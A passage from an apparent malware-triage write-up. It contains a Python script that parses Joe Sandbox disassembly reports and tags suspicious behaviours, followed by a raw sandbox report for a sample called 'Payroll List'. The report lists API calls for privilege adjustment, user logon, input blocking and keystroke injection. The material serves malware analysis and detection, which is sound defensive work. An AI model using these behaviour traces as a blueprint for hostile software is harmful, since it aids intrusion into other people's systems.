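• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00166554
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00166564
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00166583
• __wsplitpath.LIBCMT ref: 001665A7
APIs
  • Part of subcall function 0017A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0017A84E
• socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00179296
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,0013E014,75570AE0,0013DEF1,001BDC38,?,?), ref: 0013E02C
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0013E03E
• String ID: GetNativeSystemInfo$kernel32.dll
"""

# One API line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional (args), then "ref: ADDR". An arg is hex, or '?' when unrecovered.
API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<via>[0-9A-F]+):\s*)?"
                    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID|API String ID):\s*(?P<val>.*)$")

@dataclass
class ApiCall:
    name: str
    args: List[str]
    ref: int
    via: Optional[int]          # subcall address the API is reached through, if any

@dataclass
class FuncBlock:
    calls: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)

    def anchor(self) -> Optional[int]:   # lowest direct ref address, used as key
        direct = [c.ref for c in self.calls if c.via is None]
        return min(direct) if direct else None

    def strings(self) -> List[str]:      # Joe Sandbox joins referenced strings with '$'
        return [s for s in self.meta.get("String ID", "").split("$") if s]

def parse_blocks(text: str) -> List[FuncBlock]:
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":       # every function block starts with this header
            cur = FuncBlock()
            blocks.append(cur)
        elif cur is not None and (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], args, int(m["ref"], 16),
                                     int(m["via"], 16) if m["via"] else None))
        elif cur is not None and (m := FIELD_RE.match(line)):
            cur.meta[m["key"]] = m["val"].strip()
    return blocks

AF, SOCK, PROTO = {2: "AF_INET"}, {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}, {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

def _hexarg(call: ApiCall, i: int) -> Optional[int]:
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):     # missing, or '?' (not recovered by the plugin)
        return None

def tag_block(b: FuncBlock) -> List[str]:
    """Behaviour tags for one block; the tag wording is this example's own."""
    names = {c.name for c in b.calls}
    tags: List[str] = []
    if "AdjustTokenPrivileges" in names:
        privs = [s for s in b.strings() if s.endswith("Privilege")]
        tags.append("enables token privilege " + (",".join(privs) or "(unknown)"))
    if "ExitWindowsEx" in names:
        tags.append("shutdown/logoff via ExitWindowsEx")
    for c in b.calls:
        if c.name == "socket":           # decode the (af, type, protocol) triple
            fam, typ, proto = (_hexarg(c, i) for i in range(3))
            tags.append("creates socket %s/%s/%s" % (AF.get(fam, fam), SOCK.get(typ, typ), PROTO.get(proto, proto)))
    if {"bind", "listen"} <= names:
        tags.append("listening socket (bind+listen)")
    if "CreateToolhelp32Snapshot" in names and names & {"Process32FirstW", "Process32NextW"}:
        tags.append("process enumeration via Toolhelp32")
    if names & {"LoadLibraryA", "LoadLibraryW"} and "GetProcAddress" in names:
        exports = [s for s in b.strings() if not s.lower().endswith(".dll")]
        tags.append("dynamic API resolution of " + (",".join(exports) or "(unknown)"))
    return tags

def triage(text: str) -> Dict[str, List[str]]:
    """Map each block, keyed by its 8-digit anchor address, to its behaviour tags."""
    out: Dict[str, List[str]] = {}
    for b in parse_blocks(text):
        if b.anchor() is not None:
            out["%08X" % b.anchor()] = tag_block(b)
    return out

if __name__ == "__main__":
    for addr, tags in triage(SAMPLE).items():
        print(addr, "; ".join(tags) or "-")
```

To run it on the real thing, paste the function blocks of the report into a file and pass its contents to triage(); the regexes tolerate the leading indentation and the "Part of subcall function" prefix, and subcall entries are kept but excluded from the anchor so a block is keyed by an address inside the function itself.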
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0016E20D
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0016E267
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0016E2B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                    • String ID:
                                                                    • API String ID: 1682464887-0
                                                                    • Opcode ID: 1ccd5d435dc618771d24a6e89f803f132a643a160fcbe3bc1a03e2b21a970426
                                                                    • Instruction ID: d803ff51649528bb77be1aab288c19423df9acbfd03465da57ccda8c7a213b64
                                                                    • Opcode Fuzzy Hash: 1ccd5d435dc618771d24a6e89f803f132a643a160fcbe3bc1a03e2b21a970426
                                                                    • Instruction Fuzzy Hash: D6216D35A00618EFCB00EFA5D884AADFBF8FF59310F0484AAE905E7251DB319955CB50
                                                                    APIs
                                                                      • Part of subcall function 0013F4EA: std::exception::exception.LIBCMT ref: 0013F51E
                                                                      • Part of subcall function 0013F4EA: __CxxThrowException@8.LIBCMT ref: 0013F533
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0015B180
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0015B1AD
                                                                    • GetLastError.KERNEL32 ref: 0015B1BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1922334811-0
                                                                    • Opcode ID: c9ae20a3709ab5082f7c76a06622cd3e3e4bc6bc1e488de22bc17becbd1f9370
                                                                    • Instruction ID: 958c6d45413ac802cf60468e69fb5181cf525681c64402f4c61dc1c7b394ec8a
                                                                    • Opcode Fuzzy Hash: c9ae20a3709ab5082f7c76a06622cd3e3e4bc6bc1e488de22bc17becbd1f9370
                                                                    • Instruction Fuzzy Hash: F411BFB1804604AFE7189F64ECC5D2BB7BCFB44311B20852EF45A97640DB70FC458B60
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00166623
                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00166664
                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0016666F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                    • String ID:
                                                                    • API String ID: 33631002-0
                                                                    • Opcode ID: f146e51ed45168273834553173c61c5df57567e81d8e25fd15c866ea18fd2316
                                                                    • Instruction ID: 7f2fdc609dabe1bb3833836c4b8a04dd8711c8545ba6589c352d2d845a94dd16
                                                                    • Opcode Fuzzy Hash: f146e51ed45168273834553173c61c5df57567e81d8e25fd15c866ea18fd2316
                                                                    • Instruction Fuzzy Hash: A6111EB1E01228BFDB108FA5EC45BAEBBBCEB45B10F104156F901F6290D7B05E059BA5
                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00167223
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0016723A
                                                                    • FreeSid.ADVAPI32(?), ref: 0016724A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    • Opcode ID: c5eb41dc97a171e772c9bef4494589869d2a6a9733c03636bffe53b3bea3d2a6
                                                                    • Instruction ID: 7e30491ebbf09797f8ba665b9ed5193a6ae2744387d699d2fdf764a99abd1dae
                                                                    • Opcode Fuzzy Hash: c5eb41dc97a171e772c9bef4494589869d2a6a9733c03636bffe53b3bea3d2a6
                                                                    • Instruction Fuzzy Hash: C2F01776A04209BFDF04DFF4DD99AEEBBB8FF09205F104869B602E2591E3709A448B10
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0016F599
                                                                    • FindClose.KERNEL32(00000000), ref: 0016F5C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: c734de02e9da6896efd040c25d3e07d94c12ee4f524315750452560cacbe90b0
                                                                    • Instruction ID: 665256c5a4c50032e396a99b7e925927b2630612d9609e848f857c97d01aa271
                                                                    • Opcode Fuzzy Hash: c734de02e9da6896efd040c25d3e07d94c12ee4f524315750452560cacbe90b0
                                                                    • Instruction Fuzzy Hash: AD1188716046009FD710EF28D845A2EF7E5FF95324F00855EF8AAD7291DB30AD158B85
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0017BE6A,?,?,00000000,?), ref: 0016CEA7
                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0017BE6A,?,?,00000000,?), ref: 0016CEB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
                                                                    • Opcode ID: 084dcb4edf3c3fa8818731916a843a2200cc76aaf423b8c69730e777af2b28cb
                                                                    • Instruction ID: 8d13cbf218f610feac1beab72323c31df30b1ef12d936d4d0e80c05e24e9e9d5
                                                                    • Opcode Fuzzy Hash: 084dcb4edf3c3fa8818731916a843a2200cc76aaf423b8c69730e777af2b28cb
                                                                    • Instruction Fuzzy Hash: 6BF08271500229ABDB109BA4DC49FFA777DBF09351F004165F915D6191D7709A54CBA0
                                                                    APIs
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00164153
                                                                    • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00164166
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: InputSendkeybd_event
                                                                    • String ID:
                                                                    • API String ID: 3536248340-0
                                                                    • Opcode ID: 66494680988c2787e42a18d971e7c75cf8631bb7bfdc40b24cfa319d2c2fdac1
                                                                    • Instruction ID: bfeece4457f11ab89ff7dbfa08af56cfbea11e0b849cf33128c61be02b8ad3e2
                                                                    • Opcode Fuzzy Hash: 66494680988c2787e42a18d971e7c75cf8631bb7bfdc40b24cfa319d2c2fdac1
                                                                    • Instruction Fuzzy Hash: 1DF0677080024DAFDB058FA0CC05BBE7BB0EF01305F04800AF966A6192D77996569FA0
                                                                    APIs
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0015ACC0), ref: 0015AB99
                                                                    • CloseHandle.KERNEL32(?,?,0015ACC0), ref: 0015ABAB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 81990902-0
                                                                    • Opcode ID: 77204a1f037b66264b8b04414b4546d8e24fbe95c420224c6c44cb2c3b6f22aa
                                                                    • Instruction ID: c4e9cf23aa2d1a3a01f84804d94670ac92a71d03d09928dcebf080bc042deaf6
                                                                    • Opcode Fuzzy Hash: 77204a1f037b66264b8b04414b4546d8e24fbe95c420224c6c44cb2c3b6f22aa
                                                                    • Instruction Fuzzy Hash: 0FE0BF75400510EFE7252F54FC09D777BA9EF04321B10852DB85A81870DB625C91DB50
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00146DB3,-0000031A,?,?,00000001), ref: 001481B1
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 001481BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 85ddec9fbe34fe53ef5405f11042e03a65b6e76c5fc72b4341415c231a1d6e50
                                                                    • Instruction ID: ba90f987785a914c0fcd37255842cb9d672046e250aeb88a7496af8148ac2227
                                                                    • Opcode Fuzzy Hash: 85ddec9fbe34fe53ef5405f11042e03a65b6e76c5fc72b4341415c231a1d6e50
                                                                    • Instruction Fuzzy Hash: A5B092B1044A08ABDF012BA1FC0AB587F68FF0A652F004010F60E44C618B7254908B92
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 366b89e4b17eb5d2b20d44367116cded70cd8b9b99a1a3556f9a34ff30ece7aa
                                                                    • Instruction ID: e43028a20732a9011d0c85221c587118f773a9e196748f59a93e1519bb18814d
                                                                    • Opcode Fuzzy Hash: 366b89e4b17eb5d2b20d44367116cded70cd8b9b99a1a3556f9a34ff30ece7aa
                                                                    • Instruction Fuzzy Hash: 9DA25C74D04229DFCF28CF68D4806ADBBB1FF49314F2581A9E859AB390D7349E91DB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                    • String ID: @
                                                                    • API String ID: 3728558374-2766056989
                                                                    • Opcode ID: 199624215a37a7b6bdb9ed4c91fe0a5eab41c7c95312166ee9cf45409be4c9e2
                                                                    • Instruction ID: 480291e21ea473d5caeb82de7257f5665b6cfe8df669cc6b9b59582006619cd3
                                                                    • Opcode Fuzzy Hash: 199624215a37a7b6bdb9ed4c91fe0a5eab41c7c95312166ee9cf45409be4c9e2
                                                                    • Instruction Fuzzy Hash: 0E72AC70E04208DFCF18DF94C891ABEB7B5EF58300F15806AF919AB291D735AE45CB95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
Similarity
• API ID: __itow__swprintf
• String ID:
• API String ID: 674341424-0
APIs
• __time64.LIBCMT ref: 0016B6DF
  • Part of subcall function 0014344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0016BDC3,00000000,?,?,?,?,0016BF70,00000000,?), ref: 00143453
  • Part of subcall function 0014344A: __aulldiv.LIBCMT ref: 00143473
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID:
• API String ID: 2893107130-0
APIs
• BlockInput.USER32(00000001), ref: 00176ACA
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 001674DE
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0015AD3E), ref: 0015B124
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
APIs
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0014818F
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Similarity
• API ID: BuffCharUpper
• String ID:
• API String ID: 3964851224-0
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 3728558374-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                    • Instruction ID: b16d1da60fb5133527c29a43de352730dbc79088fa4ecccb0fa2e6c2c3b63447
                                                                    • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                    • Instruction Fuzzy Hash: CCC1A1322091930ADF6E463AC47443EBAA15BA2BB571B077DD4B3CB4E5EF20D525E620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction ID: 6d339e84b3c610bd41c2611f035c98ad83efb5ff82ff1babd27f3cdb95de0dad
                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction Fuzzy Hash: 90C1813260909309DF2D463AC47443EFAA15AA2BB1B1B177DD8B2CB5D5EF20C566D620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction ID: b1df0543c30d9af8c6a034165d41835c5bbf986beababfac89cd761efe5a4667
                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction Fuzzy Hash: 2441B571D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction ID: b20a7fbfc12b2db1460b68745e74b1d1f3b3bdf84790ed52f824821e44482f34
                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction Fuzzy Hash: D4019D78A01209EFCB44DF98C5909AEF7B5FB48311F248699ED09A7301DB30AE41EB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction ID: a9145df5f96b688e9a0ca513cacc737e6768bcc595ab87d57c4d107ffb9d5b09
